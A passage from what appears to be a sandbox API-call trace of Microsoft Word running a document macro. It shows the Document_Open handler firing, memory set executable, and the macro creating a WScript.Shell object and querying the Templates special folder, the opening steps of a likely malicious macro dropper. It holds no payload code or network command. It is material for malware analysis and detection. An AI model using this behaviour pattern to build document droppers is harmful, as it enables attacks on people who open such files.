(This=0x1d39d552bc8) returned 0x0 [0060.323] IUnknown:Release (This=0x1d39d552bc8) returned 0x7 [0060.323] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x230) returned 0x1d39d8b0670 [0060.323] strcpy_s (in: _Dst=0x1d39d8b06b0, _DstSize=0x9, _Src="Document" | out: _Dst="Document") returned 0x0 [0060.323] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xc8) returned 0x1d39d7d4480 [0060.323] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552bc8, ppTypeAttr=0x33e4fb5a10, pDummy=0x1d39d552bc8 | out: ppTypeAttr=0x33e4fb5a10, pDummy=0x1d39d552bc8*=0x961f308) returned 0x0 [0060.323] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d552bc8, ppTLib=0x33e4fb5a18, pIndex=0x33e4fb5a58 | out: ppTLib=0x33e4fb5a18*=0x1d3985c4c00, pIndex=0x33e4fb5a58*=0x20e) returned 0x0 [0060.324] ITypeLib:RemoteGetLibAttr (in: This=0x1d3985c4c00, ppTLibAttr=0x33e4fb5708, pDummy=0x0 | out: ppTLibAttr=0x33e4fb5708, pDummy=0x0) returned 0x0 [0060.324] ITypeLib:RemoteGetDocumentation (in: This=0x1d3985c4c00, index=-1, refPtrFlags=0xe4fb5720, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0060.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchWideChar=58, lpMultiByteStr=0x33e4fb5790, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB!\x98Ó\x01", lpUsedDefaultChar=0x0) returned 58 [0060.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x33e4fb58a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0060.324] ITypeLib:LocalReleaseTLibAttr (This=0x1d3985c4c00) returned 0x0 [0060.324] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x412) returned 0x1d39dbc1f40 [0060.324] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x230) returned 0x1d39d8b08b0 [0060.324] IUnknown:AddRef (This=0x1d39d552bc8) returned 0x8 [0060.324] IUnknown:Release (This=0x1d3985c4c00) returned 0x14 [0060.324] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552bc8) returned 0x0 [0060.324] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552bc8) returned 0x0 [0060.324] _mbscpy_s (in: _Dst=0x33e4fb5640, _DstSizeInBytes=0xe, _Src=0x1d3a3172b3a | out: _Dst=0x33e4fb5640) returned 0x0 [0060.324] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Document") returned 0x50d36a [0060.324] _mbscpy_s (in: _Dst=0x33e4fb5640, _DstSizeInBytes=0xe, _Src=0x33e4fb5649 | out: _Dst=0x33e4fb5640) returned 0x0 [0060.324] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Open") returned 0x500767 [0060.324] IUnknown:Release (This=0x1d39d552bc8) returned 0x8 [0060.324] IUnknown:AddRef (This=0x1d39d552bc8) returned 0x9 [0060.324] _mbscpy_s (in: _Dst=0x33e4fb5600, _DstSizeInBytes=0xe, _Src=0x1d3a3172b3a | out: _Dst=0x33e4fb5600) returned 0x0 [0060.324] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Document") returned 0x50d36a [0060.324] _mbscpy_s (in: _Dst=0x33e4fb5600, _DstSizeInBytes=0xe, _Src=0x33e4fb5609 | out: _Dst=0x33e4fb5600) returned 0x0 [0060.325] IUnknown:Release (This=0x1d39d552bc8) returned 0x8 [0060.325] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x48) returned 0x1d39d7beec0 [0060.325] strcpy_s (in: _Dst=0x1d39d8b06c8, _DstSize=0xe, _Src="Document_Open" | out: _Dst="Document_Open") returned 0x0 [0060.325] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x26d) returned 0x1d39808b080 [0060.325] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39808b080) returned 0x26d [0060.325] GetCurrentProcess () returned 0xffffffffffffffff [0060.325] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39808b080, dwSize=0x45) returned 1 [0060.325] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39808b080) [0060.325] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x30) returned 0x1d39d4a3770 [0060.325] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x26d) returned 0x1d39808b080 [0060.325] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39808b080) returned 0x26d [0060.325] GetCurrentProcess () returned 0xffffffffffffffff [0060.325] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39808b080, dwSize=0x45) returned 1 [0060.325] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39808b080) [0060.325] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x230) returned 0x1d39d8b11b0 [0060.325] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x14) returned 0x1d39dbb3df0 [0060.325] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x412) returned 0x1d39dbbd1a0 [0060.325] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3df0) [0060.325] free (_Block=0x0) [0060.325] free (_Block=0x0) [0060.326] free (_Block=0x0) [0060.326] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x10) returned 0x1d39dbb3850 [0060.326] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3850) [0060.326] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x58) returned 0x1d39dbe9550 [0060.326] GetCurrentProcess () returned 0xffffffffffffffff [0060.326] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39d8af7d9, dwSize=0x8) returned 1 [0060.326] GetCurrentProcess () returned 0xffffffffffffffff [0060.326] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39d8af7d8, dwSize=0x8) returned 1 [0060.326] GetCurrentProcess () returned 0xffffffffffffffff [0060.326] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39d8af7d9, dwSize=0x8) returned 1 [0060.326] GetCurrentProcess () returned 0xffffffffffffffff [0060.326] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39d8af7d8, dwSize=0x8) returned 1 [0060.326] GetCurrentProcess () returned 0xffffffffffffffff [0060.326] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39d8af7e8, dwSize=0x2) returned 1 [0060.326] GetCurrentProcess () returned 0xffffffffffffffff [0060.326] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39d8af83c, dwSize=0x45) returned 1 [0060.326] VirtualProtect (in: lpAddress=0x1d39d8af83c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x33e4fb66bc | out: lpflOldProtect=0x33e4fb66bc*=0x4) returned 1 [0060.327] GetCurrentProcess () returned 0xffffffffffffffff [0060.327] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39d8b11fc, dwSize=0x45) returned 1 [0060.327] VirtualProtect (in: lpAddress=0x1d39d8b11fc, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x33e4fb66bc | out: lpflOldProtect=0x33e4fb66bc*=0x4) returned 1 [0060.328] free (_Block=0x0) [0060.328] free (_Block=0x0) [0060.328] free (_Block=0x0) [0060.328] IUnknown:Release (This=0x1d39d552a68) returned 0x1 [0060.328] free (_Block=0x0) [0060.328] free (_Block=0x0) [0060.328] free (_Block=0x0) [0060.328] IUnknown:Release (This=0x1d39d552a68) returned 0x1 [0060.328] free (_Block=0x0) [0060.328] free (_Block=0x0) [0060.328] free (_Block=0x0) [0060.328] IUnknown:AddRef (This=0x1d39d552b18) returned 0x3 [0060.328] IUnknown:QueryInterface (in: This=0x1d39d552b18, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb7278 | out: ppvObject=0x33e4fb7278*=0x0) returned 0x80004002 [0060.328] IUnknown:QueryInterface (in: This=0x1d39d552b18, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb7270 | out: ppvObject=0x33e4fb7270*=0x0) returned 0x80004002 [0060.328] IUnknown:Release (This=0x1d39d552b18) returned 0x2 [0060.329] IUnknown:AddRef (This=0x1d39d552bc8) returned 0x9 [0060.329] IUnknown:QueryInterface (in: This=0x1d39d552bc8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb7278 | out: ppvObject=0x33e4fb7278*=0x0) returned 0x80004002 [0060.329] IUnknown:QueryInterface (in: This=0x1d39d552bc8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb7270 | out: ppvObject=0x33e4fb7270*=0x0) returned 0x80004002 [0060.329] IUnknown:Release (This=0x1d39d552bc8) returned 0x8 [0060.329] IUnknown:AddRef (This=0x1d39d552a68) returned 0x2 [0060.329] IUnknown:QueryInterface (in: This=0x1d39d552a68, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb7278 | out: ppvObject=0x33e4fb7278*=0x0) returned 0x80004002 [0060.329] IUnknown:QueryInterface (in: This=0x1d39d552a68, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb7270 | out: ppvObject=0x33e4fb7270*=0x0) returned 0x80004002 [0060.329] IUnknown:Release (This=0x1d39d552a68) returned 0x1 [0060.329] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x8) returned 0x1d39d4a7e20 [0060.329] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39d4a7e20) returned 0x8 [0060.329] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x78) returned 0x1d39d99ab00 [0060.329] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39d99ab00) returned 0x78 [0060.329] IUnknown:AddRef (This=0x1d39d552bc8) returned 0x9 [0060.329] IUnknown:QueryInterface (in: This=0x1d39d552bc8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb7358 | out: ppvObject=0x33e4fb7358*=0x0) returned 0x80004002 [0060.329] IUnknown:QueryInterface (in: This=0x1d39d552bc8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb7350 | out: ppvObject=0x33e4fb7350*=0x0) returned 0x80004002 [0060.329] IUnknown:Release (This=0x1d39d552bc8) returned 0x8 [0060.329] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x8) returned 0x1d39d4a7f40 [0060.329] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39d4a7f40) returned 0x8 [0060.329] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x78) returned 0x1d39d99a300 [0060.329] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39d99a300) returned 0x78 [0060.330] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x8) returned 0x1d39d4a8a20 [0060.330] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39d4a8a20) returned 0x8 [0060.330] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x78) returned 0x1d39d999d80 [0060.330] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39d999d80) returned 0x78 [0060.334] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0060.334] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x40) returned 0x1d39d7bf4b0 [0060.334] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", ulOptions=0x0, samDesired=0x1, phkResult=0x33e4fb6400 | out: phkResult=0x33e4fb6400*=0x1564) returned 0x0 [0060.334] RegQueryValueExA (in: hKey=0x1564, lpValueName="VbaCapability", lpReserved=0x0, lpType=0x0, lpData=0x33e4fb63f8, lpcbData=0x33e4fb63f0*=0x4 | out: lpType=0x0, lpData=0x33e4fb63f8*=0x94, lpcbData=0x33e4fb63f0*=0x4) returned 0x2 [0060.334] RegCloseKey (hKey=0x1564) returned 0x0 [0060.334] DispCallFunc (pvInstance=0x1d39d999de0, oVft=0x38, cc=0x4, vtReturn=0xa, cActuals=0x0, prgvt=0x0, prgpvarg=0x0, pvargResult=0x33e4fb6610) returned 0x0 [0060.334] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1000, lpStartAddress=0x7ffce08221e0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x33e4fb60c0 | out: lpThreadId=0x33e4fb60c0*=0x13e4) returned 0x1564 [0060.335] PeekMessageA (in: lpMsg=0x33e4fb6060, hWnd=0x60040, wMsgFilterMin=0x1045, wMsgFilterMax=0x1045, wRemoveMsg=0x3 | out: lpMsg=0x33e4fb6060) returned 0 [0060.336] GetActiveWindow () returned 0x10306 [0060.340] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x810) returned 0x1d39dc24e70 [0060.340] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x30) returned 0x1d39d4a4470 [0060.341] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d3a3d00000 [0060.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d39d8f9c4e, cbMultiByte=13, lpWideCharStr=0x1d3a3d000dc, cchWideChar=28 | out: lpWideCharStr="WScript.Shell") returned 13 [0060.341] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x412) returned 0x1d39dbbd5f0 [0060.341] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x200) returned 0x1d39d98d2c0 [0060.341] realloc (_Block=0x0, _Size=0x200) returned 0x1d39bdee670 [0060.342] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CreateObject") returned 0x508af8 [0060.342] strcpy_s (in: _Dst=0x33e4fb4760, _DstSize=0xd, _Src="CreateObject" | out: _Dst="CreateObject") returned 0x0 [0060.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb4760, cbMultiByte=13, lpWideCharStr=0x33e4fb45b0, cchWideChar=13 | out: lpWideCharStr="CreateObject") returned 13 [0060.342] IUnknown:AddRef (This=0x1d3980663b0) returned 0x8 [0060.342] ITypeLib:RemoteIsName (in: This=0x1d3980663b0, szNameBuf="CreateObject", lHashVal=0x508af8, pfName=0x33e4fb4680, pBstrLibName=0x33e4fb45b0 | out: pfName=0x33e4fb4680*=1, pBstrLibName=0x33e4fb45b0) returned 0x0 [0060.342] IUnknown:Release (This=0x1d3980663b0) returned 0x7 [0060.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateObject", cchWideChar=-1, lpMultiByteStr=0x33e4fb4760, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateObject", lpUsedDefaultChar=0x0) returned 13 [0060.342] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CreateObject") returned 0x508af8 [0060.343] IUnknown:Release (This=0x1d39d552b18) returned 0x3 [0060.343] IUnknown:Release (This=0x1d39d552b18) returned 0x2 [0060.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a32b2b96, cbMultiByte=13, lpWideCharStr=0x33e4fb46e0, cchWideChar=14 | out: lpWideCharStr="CreateObject") returned 13 [0060.343] ITypeComp:RemoteBind (in: This=0x1d39d552b20, szName="CreateObject", lHashVal=0x508af8, wFlags=0x3, ppTInfo=0x33e4fb4698, pDescKind=0x33e4fb46ac, ppFuncDesc=0x33e4fb46b0, ppVarDesc=0x7ffd09599971, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x33e4fb4698*=0x0, pDescKind=0x33e4fb46ac*=0, ppFuncDesc=0x33e4fb46b0, ppVarDesc=0x7ffd09599971, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0060.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172bba, cbMultiByte=13, lpWideCharStr=0x33e4fb4840, cchWideChar=14 | out: lpWideCharStr="CreateObject") returned 13 [0060.343] ITypeComp:RemoteBind (in: This=0x1d3980663c0, szName="CreateObject", lHashVal=0x508af8, wFlags=0x3, ppTInfo=0x33e4fb47f8, pDescKind=0x33e4fb480c, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x33e4fb47f8*=0x1d39d9d5068, pDescKind=0x33e4fb480c*=1, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0060.344] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d9d5068, ppTypeAttr=0x33e4fb4800, pDummy=0x1d39d966080 | out: ppTypeAttr=0x33e4fb4800, pDummy=0x1d39d966080*=0x0) returned 0x0 [0060.344] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d9d5068) returned 0x0 [0060.344] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d825c30, cb=0x100) returned 0x1d39d94bf90 [0060.344] SysStringByteLen (bstr="") returned 0x0 [0060.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x33e4fb4570, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ÐFûä3", lpUsedDefaultChar=0x0) returned 0 [0060.344] IUnknown:QueryInterface (in: This=0x1d39d9d5068, riid=0x7ffce0bca878*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb45a0 | out: ppvObject=0x33e4fb45a0*=0x1d39d9d5068) returned 0x0 [0060.344] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x1d39d9d5068, memid=1610612738, invkind=1, pFuncIndex=0x33e4fb4598 | out: pFuncIndex=0x33e4fb4598*=0x2) returned 0x0 [0060.344] ITypeInfo2:GetParamCustData (in: This=0x1d39d9d5068, indexFunc=0x2, indexParam=0x1, GUID=0x7ffce0bd88b0*(Data1=0x270d72b0, Data2=0xffb8, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xbd, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x26, [7]=0xee)), pVarVal=0x33e4fb45a8 | out: pVarVal=0x33e4fb45a8*(varType=0x0, wReserved1=0x9d94, wReserved2=0x1d3, wReserved3=0x0, varVal1=0x1d39d9cb6a0, varVal2=0x33e4fb52b8)) returned 0x0 [0060.344] IUnknown:Release (This=0x1d39d9d5068) returned 0x1 [0060.344] IUnknown:QueryInterface (in: This=0x1d39d9d5068, riid=0x7ffce0bca878*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb4660 | out: ppvObject=0x33e4fb4660*=0x1d39d9d5068) returned 0x0 [0060.344] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x1d39d9d5068, memid=1610612738, invkind=1, pFuncIndex=0x33e4fb46a0 | out: pFuncIndex=0x33e4fb46a0*=0x2) returned 0x0 [0060.344] ITypeInfo2:GetFuncCustData (in: This=0x1d39d9d5068, index=0x2, GUID=0x7ffce0bd6f38*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x33e4fb46b8 | out: pVarVal=0x33e4fb46b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3300000002, varVal2=0x508af8)) returned 0x0 [0060.344] IUnknown:Release (This=0x1d39d9d5068) returned 0x1 [0060.344] IUnknown:AddRef (This=0x1d39d9d5068) returned 0x2 [0060.344] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d9d5068) returned 0x0 [0060.344] IUnknown:Release (This=0x1d39d9d5068) returned 0x1 [0060.344] IUnknown:QueryInterface (in: This=0x1d39d9d5068, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4928 | out: ppvObject=0x33e4fb4928*=0x0) returned 0x80004002 [0060.344] IUnknown:AddRef (This=0x1d39d9d5068) returned 0x2 [0060.344] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d83b740, cb=0x100) returned 0x1d39d94afa0 [0060.344] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d398214620, cb=0x40) returned 0x1d39d7be8d0 [0060.344] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d398214d70, cb=0x50) returned 0x1d39dbe9c70 [0060.345] IUnknown:Release (This=0x1d39d9d5068) returned 0x2 [0060.345] IUnknown:QueryInterface (in: This=0x1d39d9d5068, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.345] IUnknown:QueryInterface (in: This=0x1d39d9d5068, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d39d94c08c, cbMultiByte=0, lpWideCharStr=0x1d3a3d0028c, cchWideChar=2 | out: lpWideCharStr="") returned 0 [0060.345] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d5068, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.345] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.345] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.345] IUnknown:Release (This=0x1d3980663b0) returned 0x9 [0060.345] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d5068, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.345] strcpy_s (in: _Dst=0x1d39d8b0738, _DstSize=0x9, _Src="VBE7.DLL" | out: _Dst="VBE7.DLL") returned 0x0 [0060.345] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d5068, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.345] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d5068, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.345] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x412) returned 0x1d39dbc3080 [0060.345] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x26d) returned 0x1d39808b080 [0060.345] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39808b080) returned 0x26d [0060.345] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39808b080) returned 0x26d [0060.345] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39808b080) returned 0x26d [0060.345] GetCurrentProcess () returned 0xffffffffffffffff [0060.346] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39808b080, dwSize=0x4b) returned 1 [0060.346] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39808b080) [0060.346] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x318) returned 0x1d39db06c10 [0060.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d39d8f9c6c, cbMultiByte=9, lpWideCharStr=0x1d3a3d0094a, cchWideChar=20 | out: lpWideCharStr="Templates") returned 9 [0060.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172bea, cbMultiByte=16, lpWideCharStr=0x33e4fb4660, cchWideChar=15 | out: lpWideCharStr="SpecialFolders") returned 0 [0060.346] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x412) returned 0x1d39dbbda40 [0060.347] wcscpy_s (in: _Destination=0x1d39d8b0840, _SizeInWords=0xf, _Source="SpecialFolders" | out: _Destination="SpecialFolders") returned 0x0 [0060.347] _mbscpy_s (in: _Dst=0x33e4fb4c60, _DstSizeInBytes=0x4, _Src=0x1d3a3172c1a | out: _Dst=0x33e4fb4c60) returned 0x0 [0060.347] _mbscpy_s (in: _Dst=0x33e4fb4c60, _DstSizeInBytes=0x4, _Src=0x1d3a3172c3e | out: _Dst=0x33e4fb4c60) returned 0x0 [0060.347] _mbscpy_s (in: _Dst=0x33e4fb4c60, _DstSizeInBytes=0x4, _Src=0x1d3a3172c62 | out: _Dst=0x33e4fb4c60) returned 0x0 [0060.347] _mbscpy_s (in: _Dst=0x33e4fb4c60, _DstSizeInBytes=0x4, _Src=0x1d3a3172c86 | out: _Dst=0x33e4fb4c60) returned 0x0 [0060.347] _mbscpy_s (in: _Dst=0x33e4fb4c60, _DstSizeInBytes=0x4, _Src=0x1d3a3172caa | out: _Dst=0x33e4fb4c60) returned 0x0 [0060.347] _mbscpy_s (in: _Dst=0x33e4fb4c60, _DstSizeInBytes=0x4, _Src=0x1d3a3172cf2 | out: _Dst=0x33e4fb4c60) returned 0x0 [0060.347] _mbscpy_s (in: _Dst=0x33e4fb4c60, _DstSizeInBytes=0x4, _Src=0x1d3a3172d16 | out: _Dst=0x33e4fb4c60) returned 0x0 [0060.347] LHashValOfNameSysA (syskind=0x3, lcid=0x412, 